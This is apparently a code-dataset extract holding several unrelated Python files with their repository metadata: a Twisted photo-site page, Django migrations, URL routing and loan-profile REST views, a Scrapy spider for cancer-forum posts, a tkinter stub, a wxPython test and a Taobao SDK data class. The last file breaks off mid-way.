41,602,694
0
0
null
null
null
null
UTF-8
Python
false
false
4,309
py
""" dyn_pages/user_homepage.py Author: Trey Stout Date Added: ? User homepage. Also the starting point for all user interior pages. """ ## STD LIBS ## OUR LIBS from zoto_base_page import zoto_base_page from dyn_image_handler import dyn_image_handler from user_albums import user_albums from user_galleries import user_galleries from user_publish import user_publish from feeds import feeds from other_sizes import other_sizes ## 3RD PARTY LIBS from twisted.web.util import redirectTo from twisted.internet.defer import Deferred from nevow import loaders, inevow, tags as T class user_homepage(zoto_base_page): local_js_includes = [ "countries.js", "static_news.js", "select_box.lib.js", "pagination.lib.js", "e_paper.lib.js", "globber.lib.js", "tag_cloud.lib.js", "comments.lib.js", "albums.lib.js", "featured_media.lib.js", "widget.lib.js", "image_detail.lib.js", "table.lib.js", "lookahead.lib.js", "detect.lib.js", "third_party/swfobject.js", "messages.lib.js" ] page_manager_js = "managers/user_homepage.js" def __init__(self, username): zoto_base_page.__init__(self) self.username = username.lower() def _get_browse_username(self, ctx): return self.username def render_my_photo_link(self, ctx, data): return '/%s/photos/' % self.username # def get_avatar_permission(): # def handle_info(perm_info): # if perm_info.get('view_flag', 3): # # d = self.app.api.permissions.get_image_permissions(self.username, user_info['avatar_id']) # d.addCallback(handle_info) def avatar_handler(self, ctx, size): request = inevow.IRequest(ctx) color_option = self._get_color_option(ctx) bg, fg = color_option.split("_") def handle_avatar_display(result): if not result['can_view']: # generic avatar return redirectTo('/image/avatar-%d.jpg' % size, request) else: # browser has permission to view avatar, so show it new_segments = [str(size), self.avatar_id] handler = dyn_image_handler(self.username, self.app, self.log) handler.set_segments(new_segments) return handler def get_auth_username(self): d2 = Deferred() auth_hash = request.getCookie('auth_hash') if auth_hash: self.auth_username = auth_hash.split(':')[0].lower() else: self.auth_username = "" d2.callback(0) return d2 # look up id def handle_info(result): if result[0] != 0: return redirectTo('/image/avatar-%d.jpg' % size, request) user_info = result[1] # Does the user have an avatar selected if user_info.get('avatar_id', None): self.avatar_id = user_info['avatar_id'] # then check if username can view it d3 = self.app.db.query(""" SELECT zoto_user_can_view_media( zoto_get_user_id(%s), zoto_get_image_id(zoto_get_user_id(%s), %s), zoto_get_user_id(%s) ) AS can_view """, (self.username, self.username, user_info['avatar_id'], self.auth_username), single_row=True) d3.addCallback(handle_avatar_display) return d3 else: # generic avatar return redirectTo('/image/bg_%s/%s/avatar-%d.jpg' % (bg, fg, size), request) def get_user_info(result): if result[0] != 0: return redirectTo('/image/bg_%s/%s/avatar-%d.jpg' % (bg, fg, size), request) return self.app.api.users.get_info(result[1], result[1]) d = get_auth_username(self) d.addCallback(lambda _: self.app.api.users.get_user_id(self.username)) d.addCallback(get_user_info) d.addCallback(handle_info) return d def child_img(self, ctx): return dyn_image_handler(self.username, self.app, self.log) def child_feeds(self, ctx): return feeds(self.username, self.app, self.log) def child_albums(self, ctx): return user_albums(self.username) def child_galleries(self, ctx): return user_galleries(self.username) def child_publish(self, ctx): return user_publish(self.username) def child_avatar_small(self, ctx): return self.avatar_handler(ctx, 11) def child_avatar_large(self, ctx): return self.avatar_handler(ctx, 18) def child_other_sizes(self, ctx): return other_sizes(self.username) def childFactory(self, ctx, name): if name == "": return self setattr(user_homepage, "child_avatar.jpg", user_homepage.child_avatar_large) setattr(user_homepage, "child_avatar-small.jpg", user_homepage.child_avatar_small)
7e19b1f65c28d7e8d33d9f9df1406f25cab5200c
fb652a77dd6dba0c971ac052271e1e03ff7c0d6e
/settings/migrations/0008_auto_20181113_0656.py
9d9fe0d0ca6b8a4d8782e2b78f2ff35543fb2503
[]
no_license
ryosuwito/mt-commerce
5fa8419650d8c089bc8baf75322389141b4522af
90359dada36ab903dbf30f3ab6616a3c4ed3f655
refs/heads/master
2022-12-11T05:22:31.037960
2019-03-07T10:59:58
2019-03-07T10:59:58
169,371,940
0
0
null
2022-12-08T01:21:07
2019-02-06T07:56:27
HTML
UTF-8
Python
false
false
592
py
# Generated by Django 2.0.8 on 2018-11-13 06:56 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('settings', '0007_auto_20181113_0655'), ] operations = [ migrations.AlterField( model_name='footerlink', name='addr', field=models.CharField(blank=True, max_length=400, null=True), ), migrations.AlterField( model_name='headerlink', name='addr', field=models.CharField(blank=True, max_length=400, null=True), ), ]
1055e5be5726757fa80bb3ebe93883dab06b38ae
f8ca9769a359795dc649c46e299cd9b3bfca1864
/forum/spiders/cancer_cancerforums_spider.py
f3a2c67fe128c84d117d7c3248a56d9a73bcdde2
[]
no_license
florencefantine/ehealth_scraper
d4093a67543f653de200e6610eaaf65842aa322f
886ed12d0a605584796dea11b532883c1e86d09a
refs/heads/master
2021-01-10T11:39:58.270130
2015-11-24T22:09:34
2015-11-24T22:09:34
45,852,359
1
6
null
2015-11-24T20:52:28
2015-11-09T16:51:54
Python
UTF-8
Python
false
false
3,237
py
# -*- coding: utf-8 -*- import scrapy import hashlib from scrapy.contrib.spiders import CrawlSpider, Rule from scrapy.contrib.linkextractors import LinkExtractor from scrapy.selector import Selector from forum.items import PostItemsList import re from bs4 import BeautifulSoup import logging import string import dateparser import time # Spider for crawling Adidas website for shoes class ForumsSpider(CrawlSpider): name = "cancer_cancerforums_spider" allowed_domains = ["www.cancerforums.net"] start_urls = [ "http://www.cancerforums.net/forums/13-Lung-Cancer-Forum", "http://www.cancerforums.net/forums/14-Prostate-Cancer-Forum" ] rules = ( # Rule to go to the single product pages and run the parsing function # Excludes links that end in _W.html or _M.html, because they point to # configuration pages that aren't scrapeable (and are mostly redundant anyway) Rule(LinkExtractor( restrict_xpaths='//h3/a[@class="title"]', ), callback='parsePostsList'), # Rule to follow arrow to next product grid Rule(LinkExtractor( restrict_xpaths='//span[@class="prev_next"]/a[@rel="next"]' ), follow=True), ) def cleanText(self, str): soup = BeautifulSoup(str, 'html.parser') return re.sub(" +|\n|\r|\t|\0|\x0b|\xa0",' ',soup.get_text()).strip() def getDate(self,date_str): # date_str="Fri Feb 12, 2010 1:54 pm" try: date = dateparser.parse(date_str) epoch = int(date.strftime('%s')) create_date = time.strftime("%Y-%m-%d'T'%H:%M%S%z", time.gmtime(epoch)) return create_date except Exception: #logging.error(">>>>>"+date_str) return date_str # https://github.com/scrapy/dirbot/blob/master/dirbot/spiders/dmoz.py # https://github.com/scrapy/dirbot/blob/master/dirbot/pipelines.py def parsePostsList(self,response): sel = Selector(response) posts = sel.xpath('//ol[@class="posts"]/li[@class="postbitlegacy postbitim postcontainer old"]') condition = "cancer" items = [] topic = response.xpath('//h1/span[@class="threadtitle"]/a/text()').extract_first() url = response.url for post in posts: item = PostItemsList() item['author'] = post.xpath('.//div[@class="popupmenu memberaction"]/a/strong/text()').extract_first() item['author_link'] = post.xpath('.//div[@class="popupmenu memberaction"]/a/@href').extract_first() item['condition'] = condition item['create_date'] = self.getDate(post.xpath('.//span[@class="date"]/text()').extract_first().replace(',','').strip()) item['domain'] = "".join(self.allowed_domains) item['post'] = re.sub(r'\s+',' ',self.cleanText(" ".join(post.xpath('.//div[@class="content"]//blockquote/text()').extract()))) # item['tag']='' item['topic'] = topic item['url']=url items.append(item) return items
792fba203b2bf6fd8ce56981e0f9ed7dc868c823
4e879e994720100a9354895af2bb9be33b38a42b
/xUdemy_tkinter/Sect3_1stTkinterApp/45_HelloWorld_01.py
6391cf50cb181338076904a71e1464d8797f5147
[]
no_license
pepitogrilho/learning_python
80314ec97091238ed5cc3ed47422d2e6073a3280
bbdc78a9a0513c13d991701859bcfe7a8e614a49
refs/heads/master
2023-04-09T15:07:08.866721
2023-04-02T18:45:47
2023-04-02T18:45:47
230,527,165
0
0
null
null
null
null
UTF-8
Python
false
false
110
py
# -*- coding: utf-8 -*- """ """ import tkinter as tk from tkinter import ttk root = tk.Tk() root.mainloop()
9618d0ea8bcd0e39563734aa75c10cfbf72a6dde
bbd69601912a3361d788efd03a47f9d4e3bac09e
/unittests/test_propgriddefs.py
ba6c67748213bd2fab4de8c1bcd982fff4d23034
[]
no_license
wxWidgets/Phoenix
56929484460a0399a8f1d9582bc77c20aa14748d
a1184286703cf24c4b88e5bc14cf2979c1b1ea00
refs/heads/master
2023-09-01T07:10:17.437093
2023-08-31T05:38:01
2023-08-31T05:38:01
5,078,061
2,268
677
null
2023-09-09T17:06:59
2012-07-17T06:22:25
Python
UTF-8
Python
false
false
1,278
py
import unittest from unittests import wtc import wx import wx.propgrid as pg #--------------------------------------------------------------------------- class propgriddefs_Tests(wtc.WidgetTestCase): def test_propgriddefs1(self): pg.PG_INVALID_VALUE pg.PG_DONT_RECURSE pg.PG_BASE_OCT pg.PG_BASE_DEC pg.PG_BASE_HEX pg.PG_BASE_HEXL pg.PG_PREFIX_NONE pg.PG_PREFIX_0x pg.PG_PREFIX_DOLLAR_SIGN pg.PG_KEEP_STRUCTURE pg.PG_RECURSE pg.PG_INC_ATTRIBUTES pg.PG_RECURSE_STARTS pg.PG_FORCE pg.PG_SORT_TOP_LEVEL_ONLY pg.PG_FULL_VALUE pg.PG_REPORT_ERROR pg.PG_PROPERTY_SPECIFIC pg.PG_EDITABLE_VALUE pg.PG_COMPOSITE_FRAGMENT pg.PG_UNEDITABLE_COMPOSITE_FRAGMENT pg.PG_VALUE_IS_CURRENT pg.PG_PROGRAMMATIC_VALUE pg.PG_SETVAL_REFRESH_EDITOR pg.PG_SETVAL_AGGREGATED pg.PG_SETVAL_FROM_PARENT pg.PG_SETVAL_BY_USER pg.PG_LABEL pg.PG_LABEL_STRING pg.PG_NULL_BITMAP pg.PG_COLOUR_BLACK pg.PG_DEFAULT_IMAGE_SIZE #--------------------------------------------------------------------------- if __name__ == '__main__': unittest.main()
53a4aac191b28eea03daa7302e8977d24061472a
e8cac4db53b22a28f7421ede9089bd3d4df81c82
/TaobaoSdk/Domain/AuthorizeMessage.py
3d3a557b07f3221566eec45fb68865e80848f9d1
[]
no_license
wangyu0248/TaobaoOpenPythonSDK
af14e84e2bada920b1e9b75cb12d9c9a15a5a1bd
814efaf6e681c6112976c58ec457c46d58bcc95f
refs/heads/master
2021-01-19T05:29:07.234794
2012-06-21T09:31:27
2012-06-21T09:31:27
4,738,026
7
1
null
null
null
null
UTF-8
Python
false
false
13,921
py
#! /usr/bin/env python # -*- coding: utf-8 -*- # vim: set ts=4 sts=4 sw=4 et: ## @brief 增量API # @author [email protected] # @date 2012-06-09 16:55:43 # @version: 0.0.16 from datetime import datetime import os import sys import time def __getCurrentPath(): return os.path.normpath(os.path.join(os.path.realpath(__file__), os.path.pardir)) if __getCurrentPath() not in sys.path: sys.path.insert(0, __getCurrentPath()) ## @brief <SPAN style="font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">增量API</SPAN> class AuthorizeMessage(object): def __init__(self, kargs=dict()): super(self.__class__, self).__init__() ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">ISV的AppKey</SPAN> # <UL> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">String</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">12023790</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN> # </LI> # </UL> self.app_key = None ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">授权用户的淘宝昵称</SPAN> # <UL> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">String</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">我是一个用户名</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN> # </LI> # </UL> self.nick = None ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">用户的授权开始时间。授权当天开始计算。start_date是每个授权周期开始的时间,如果这个周期没有结束用户就延长或修改了授权周期,这个开始时间是不会变的,除非这个周期结束以后再重新开始新的周期,这个字段才会被改变</SPAN> # <UL> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Date</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">2000-01-01 00:00:00</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN> # </LI> # </UL> self.start_date = None ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">用户的授权到期时间</SPAN> # <UL> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Date</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">2000-01-01 00:00:00</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN> # </LI> # </UL> self.end_date = None ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">用户创建授权给当前ISV的时间</SPAN> # <UL> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Date</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">2000-01-01 00:00:00</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN> # </LI> # </UL> self.created = None ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">用户的授权信息修改时间</SPAN> # <UL> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Date</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">2000-01-01 00:00:00</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN> # </LI> # </UL> self.modified = None ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">用户的授权状态:normal(正常),expired(过期)</SPAN> # <UL> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">String</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">normal</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN> # </LI> # </UL> self.status = None ## @brief <SPAN style="color:Blue3; font-size:16px; font-family:'宋体','Times New Roman',Georgia,Serif;">用户的授权是否已经生效(生效表示能够收到变更消息)</SPAN> # <UL> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Type</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Boolean</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Level</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">Basic</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Sample</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN> # </LI> # <LI> # <SPAN style="color:DarkRed; font-size:18px; font-family:'Times New Roman',Georgia,Serif;">Private</SPAN>: <SPAN style="color:DarkMagenta; font-size:16px; font-family:'Times New Roman','宋体',Georgia,Serif;">true</SPAN> # </LI> # </UL> self.valid = None self.__init(kargs) def _newInstance(self, name, value): propertyType = self._getPropertyType(name) if propertyType == bool: return value elif propertyType == datetime: format = "%Y-%m-%d %H:%M:%S" return datetime.strptime(value, format) elif propertyType == str: return value.encode("utf-8") else: return propertyType(value) def _getPropertyType(self, name): properties = { "app_key": "String", "nick": "String", "start_date": "Date", "end_date": "Date", "created": "Date", "modified": "Date", "status": "String", "valid": "Boolean", } nameType = properties[name] pythonType = None if nameType == "Number": pythonType = int elif nameType == "String": pythonType = str elif nameType == 'Boolean': pythonType = bool elif nameType == "Date": pythonType = datetime elif nameType == 'Field List': pythonType == str elif nameType == 'Price': pythonType = float elif nameType == 'byte[]': pythonType = str else: pythonType = getattr( sys.modules[os.path.basename( os.path.dirname(os.path.realpath(__file__))) + "." + nameType], nameType) return pythonType def __init(self, kargs): if kargs.has_key("app_key"): self.app_key = self._newInstance("app_key", kargs["app_key"]) if kargs.has_key("nick"): self.nick = self._newInstance("nick", kargs["nick"]) if kargs.has_key("start_date"): self.start_date = self._newInstance("start_date", kargs["start_date"]) if kargs.has_key("end_date"): self.end_date = self._newInstance("end_date", kargs["end_date"]) if kargs.has_key("created"): self.created = self._newInstance("created", kargs["created"]) if kargs.has_key("modified"): self.modified = self._newInstance("modified", kargs["modified"]) if kargs.has_key("status"): self.status = self._newInstance("status", kargs["status"]) if kargs.has_key("valid"): self.valid = self._newInstance("valid", kargs["valid"])
36f68e24f00be8957d914c829267f443aa391fd7
6e373b40393fb56be4437c37b9bfd218841333a8
/Level_8/Lecture_8/Lecture_8/urls.py
7ab7ccb82c8b8800412050eedcb9ac79244bbb63
[]
no_license
mahto4you/Django-Framework
6e56ac21fc76b6d0352f004a5969f9d4331defe4
ee38453d9eceea93e2c5f3cb6895eb0dce24dc2b
refs/heads/master
2023-01-22T01:39:21.734613
2020-12-04T03:01:17
2020-12-04T03:01:17
318,383,854
0
0
null
null
null
null
UTF-8
Python
false
false
801
py
"""Lecture_8 URL Configuration The `urlpatterns` list routes URLs to views. For more information please see: https://docs.djangoproject.com/en/3.0/topics/http/urls/ Examples: Function views 1. Add an import: from my_app import views 2. Add a URL to urlpatterns: path('', views.home, name='home') Class-based views 1. Add an import: from other_app.views import Home 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') Including another URLconf 1. Import the include() function: from django.urls import include, path 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) """ from django.contrib import admin from django.urls import path from enroll import views urlpatterns = [ path('admin/', admin.site.urls), path('', views.home), ]
39e9192043571cd8f92f301ed58923d316e6ea5b
15863dafe261decf655286de2fcc6e67cadef3d8
/website/apps/advisor_portal/views/loan_profile_v1.py
22f8087c08cbb5b4ecde950fc3832e48e7998731
[]
no_license
protoprojects/worksample
5aa833570a39d5c61e0c658a968f28140694c567
f1a8cd8268d032ea8321e1588e226da09925b7aa
refs/heads/master
2021-06-26T17:34:10.847038
2017-09-14T00:14:03
2017-09-14T00:14:03
103,463,317
0
0
null
null
null
null
UTF-8
Python
false
false
24,040
py
import logging import datetime from django.db.models import Prefetch, BooleanField, Case, Value, When, Q from django.http import Http404 from rest_framework import viewsets, decorators, status, filters from rest_framework.permissions import IsAuthenticated from rest_framework.response import Response from rest_framework.settings import api_settings from rest_framework_extensions.mixins import NestedViewSetMixin from advisor_portal.views.mixins import AdvisorTokenAuthMixin from advisor_portal.filters import LoanProfileInProgressFilter from advisor_portal.views import CRUD_ACTIONS, ENDPOINT_PROPERTY_METHODS from advisor_portal.views.mixins import AdvisorSetMixin from advisor_portal.views.loan_profile_v1_common import ( AdvisorLoanProfileV1BorrowerBaseView, BorrowerResourcesMixin, CoborrowerResourcesMixin, CommonAddressView, RestrictKindCreation, RestrictIncomesKindCreation, HoldingAssetsOwnershipMixin, SelectForUpdateMixin, LiabilitiesRestrictionMixin, ) from advisor_portal.paginators import ( SmallLimitOffsetPagination, LargePagePagination ) from advisor_portal.permissions import ( AllowAdvisorPermission, LoanProfileModifyOperationsPermission, ) from advisor_portal.serializers.loan_profile_v1 import ( AddressV1Serializer, AdvisorLoanProfileV1ComplexSerializer, BorrowerV1Serializer, CoborrowerV1Serializer, CreditRequestResponseSerializer, EmploymentV1Serializer, ExpenseV1Serializer, HoldingAssetV1Serializer, InsuranceAssetV1Serializer, VehicleAssetV1Serializer, IncomeV1Serializer, LiabilityV1Serializer, LoanProfileV1Serializer, ) from loans.models import ( AddressV1, BorrowerV1, CoborrowerV1, EmploymentV1, ExpenseV1, HoldingAssetV1, InsuranceAssetV1, VehicleAssetV1, IncomeV1, LiabilityV1, LoanProfileV1, ) from mismo_credit.models import CreditRequestResponse from mismo_credit.tasks import start_credit_pull from box.api_v1 import box_file_get logger = logging.getLogger('sample.advisor_portal.views') # # Complex # class AdvisorLoanProfileV1ComplexView(AdvisorTokenAuthMixin, AdvisorSetMixin, viewsets.GenericViewSet, viewsets.mixins.RetrieveModelMixin, viewsets.mixins.CreateModelMixin,): """ This is a complex view, which accepts JSON which describes loan profile and creating loan profile with all related objects automatically. """ permission_classes = (IsAuthenticated, AllowAdvisorPermission,) serializer_class = AdvisorLoanProfileV1ComplexSerializer def create(self, request, *args, **kwargs): """ Overriding to do avoid incomplete data response, returning ID will be enough. """ serializer = self.get_serializer(data=request.data) serializer.is_valid(raise_exception=True) self.perform_create(serializer) headers = self.get_success_headers(serializer.data) return Response({'id': serializer.data['id']}, status=status.HTTP_201_CREATED, headers=headers) def retrieve(self, request, *args, **kwargs): """ Overriding to do a hack with related borrower and coborrower objects. """ instance = self.get_object() instance.borrower = instance.borrowers.last() if instance.borrower: instance.coborrower = instance.borrower.coborrower serializer = self.get_serializer(instance) return Response(serializer.data) def get_queryset(self): return self.request.user.loan_profilesV1.all() advisor_loan_profile_complex_create_view = AdvisorLoanProfileV1ComplexView.as_view({'post': 'create'}) advisor_loan_profile_complex_view = AdvisorLoanProfileV1ComplexView.as_view({'get': 'retrieve'}) # # RESTful # # Main class AdvisorLoanProfileV1View(AdvisorTokenAuthMixin, SelectForUpdateMixin, AdvisorSetMixin, NestedViewSetMixin, viewsets.GenericViewSet, viewsets.mixins.CreateModelMixin, viewsets.mixins.UpdateModelMixin, viewsets.mixins.ListModelMixin, viewsets.mixins.RetrieveModelMixin, viewsets.mixins.DestroyModelMixin): """ Base loan profile view. """ permission_classes = [IsAuthenticated, AllowAdvisorPermission, LoanProfileModifyOperationsPermission, ] serializer_class = LoanProfileV1Serializer filter_class = LoanProfileInProgressFilter pagination_class = SmallLimitOffsetPagination filter_backends = [filters.OrderingFilter] + api_settings.DEFAULT_FILTER_BACKENDS ordering = ('-respa_triggered_within_last_week', '-updated') ordering_fields = ('updated', 'borrowers__first_name', 'borrowers__last_name',) qs_filter_kwargs = { 'is_active': True, 'encompass_sync_status__in': [ LoanProfileV1.ENCOMPASS_SYNCED, LoanProfileV1.ENCOMPASS_NEVER_SYNCED, LoanProfileV1.ENCOMPASS_SYNC_FAILED, ] } prefetch_list = [ Prefetch('new_property_address'), Prefetch('borrowers'), Prefetch('borrowers__mailing_address'), Prefetch('borrowers__demographics'), Prefetch('borrowers__realtor'), Prefetch('borrowers__realtor__address'), Prefetch('borrowers__previous_addresses'), Prefetch('borrowers__previous_employment'), Prefetch('borrowers__holding_assets'), Prefetch('borrowers__vehicle_assets'), Prefetch('borrowers__insurance_assets'), Prefetch('borrowers__income'), Prefetch('borrowers__expense'), Prefetch( 'borrowers__coborrower', queryset=CoborrowerV1.objects.filter(is_active=True) ), Prefetch('borrowers__coborrower__mailing_address'), Prefetch('borrowers__coborrower__demographics'), Prefetch('borrowers__coborrower__realtor'), Prefetch('borrowers__coborrower__realtor__address'), Prefetch('borrowers__coborrower__previous_addresses'), Prefetch('borrowers__coborrower__previous_employment'), Prefetch('borrowers__coborrower__holding_assets'), Prefetch('borrowers__coborrower__vehicle_assets'), Prefetch('borrowers__coborrower__insurance_assets'), Prefetch('borrowers__coborrower__income'), Prefetch('borrowers__coborrower__expense'), Prefetch('credit_request_responses'), ] def _get_paginated_lp_ids(self): """ To reduce time on ordering and slicing, it is faster to take needed IDs first to avoid decryption, and then simply select needed loan profiles. Filtered and sorted ids are paginated in the way we're paginating simple queryset. """ qs = self.request.user.loan_profilesV1.filter( **self.qs_filter_kwargs ).values_list( 'id', flat=True ) qs = self.annotate_queryset(qs) qs = self.filter_queryset(qs) return self.paginate_queryset(qs) def annotate_queryset(self, qs): today = datetime.date.today() week_ago = today - datetime.timedelta(days=7) is_respa_triggered_within_last_week_expr = Case( When(Q(_respa_triggered=True) & Q(updated__gt=week_ago), then=Value(True)), default=Value(False), output_field=BooleanField() ) return qs.annotate(respa_triggered_within_last_week=is_respa_triggered_within_last_week_expr) def get_paginated_qs(self): assert hasattr(self, '_get_paginated_lp_ids'), "%s has not '_get_paginated_lp_ids' attribute" % self qs = self.request.user.loan_profilesV1.prefetch_related( *self.prefetch_list ).filter( id__in=self._get_paginated_lp_ids() ) qs = self.annotate_queryset(qs) qs = filters.OrderingFilter().filter_queryset(self.request, qs, self) return qs def get_queryset(self): return self.request.user.loan_profilesV1.prefetch_related( *self.prefetch_list ).filter( **self.qs_filter_kwargs ) def list(self, request, *args, **kwargs): """ Overriding method because we don't need to paginate queryset since we selecting needed loan profiles by using `self._get_paginated_lp_ids()`. """ assert hasattr(self, 'get_paginated_qs'), "%s has not 'get_paginated_qs' attribute" % self queryset = self.get_paginated_qs() serializer = self.get_serializer(queryset, many=True) return self.get_paginated_response(serializer.data) def perform_destroy(self, instance): instance.is_active = False instance.save() # properties 